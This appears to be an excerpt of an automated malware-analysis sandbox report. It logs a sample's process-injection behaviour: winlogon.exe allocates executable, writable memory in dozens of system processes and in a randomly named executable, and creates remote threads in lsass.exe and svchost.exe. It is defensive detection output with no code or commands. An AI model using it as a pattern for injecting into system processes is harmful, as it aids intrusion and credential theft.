        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 210A8A00000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2B28DE00000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 157ABEB0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: 25BB8540000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1E697F40000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\explorer.exe base: 7F20000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 15C57B50000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2B9EF760000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\dasHost.exe base: 24C894C0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 21F961C0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C81BC40000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2904A8A0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 2436BB30000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: 172339F0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 26FA2F80000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25BE2B30000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 272D8A60000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1F8FBBC0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1CF2A9B0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 20537200000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 1E3C3A90000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 29B0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 20E40470000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 238A9A60000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AE0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1040000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1480000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: DB0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1300000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B90000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11E0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 3040000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B30000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AB0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: D10000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 22A0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AD0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2EB0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2700000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DB0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2400000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B60000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 8A0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2A50000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 3010000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 980000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: D80000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1150000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2350000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2980000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: F30000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: C60000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 7D0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2610000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1380000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2200000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DA0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 24B0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B60000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 930000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 12D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 6F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 26F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2240000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: CB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 780000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: ED0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1FD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2400000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 7E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2D50000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 26F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 14E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 9E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: EF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 12A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1200000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: ED0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 860000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2AD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2EA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1000000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2BE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: FD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18D132A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\cmd.exe base: 1B780BB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\conhost.exe base: 264072F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C5BFFD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E1AE450000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220450000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\more.com base: 234FE4F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 2693C0E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1AAD1C40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1A42C600000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\System32\winlogon.exe EIP: 277D2DF0
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\lsass.exe EIP: 8AEB4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 9FDC4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\dwm.exe EIP: 88914048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 86F44048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 85F84048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 59CE4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 88B94048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 8CDB4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 4D884048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: C26D4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F1E64048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: FF5C4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: E0564048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 2B364048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 6AC94048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 678A4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: B0DA4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5B944048
